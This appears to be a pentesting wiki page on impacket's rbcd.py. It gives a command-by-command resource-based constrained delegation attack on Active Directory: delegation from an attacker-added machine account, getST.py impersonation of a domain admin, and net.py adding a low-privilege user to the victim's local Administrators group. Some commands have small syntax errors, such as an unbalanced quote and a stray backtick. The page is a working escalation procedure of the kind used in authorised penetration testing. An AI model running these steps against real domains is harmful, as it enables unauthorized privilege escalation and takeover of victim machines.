# rbcd.py
rbcd.py is part of [impacket](https://github.com/fortra/impacket).

## Example of doing the RBCD attack when you have the TGT of a user with write access to a victim machine

Delegate TO a victim box FROM the machine you added to AD
```
rbcd.py -delegate-from 'GHOSTY$' -delegate-to 'VICTIMSYSTEM$' -action 'write' 'domain.com/user-you-have-a-TGT-for -k -no-pass
```

Then use [getst](/pentesting/Internal/getst) to request a TGS on behalf of a high privilege user. 
```
getST.py -impersonate 'domainadmin' -spn 'cifs/victim.domain.com' 'domain.com/GHOSTY$' -k -no-pass
export KRB5CCNAME=domainadmin.ccache
```

Then use [gettgt](/pentesting/Internal/gettgt) to request a TGT for the GHOSTY machine. 
```
gettgt.py domain.com/GHOSTY$`
export KRB5CCNAME=GHOSTY.ccache
```
Then use [getst](/pentesting/Internal/getst) one more time to request TGS on behalf of a high privilege user.
```
getST.py -impersonate 'domainadmin' -spn 'cifs/VICTIM.domain.com' 'domain.com/GHOSTY$'
```

Finally, use something like [net.py](/pentesting/Internal/net) to grant yourself local admin rights
```
net.py -k -no-pass VICTIM localgroup -name Administrators -join lowpriv
```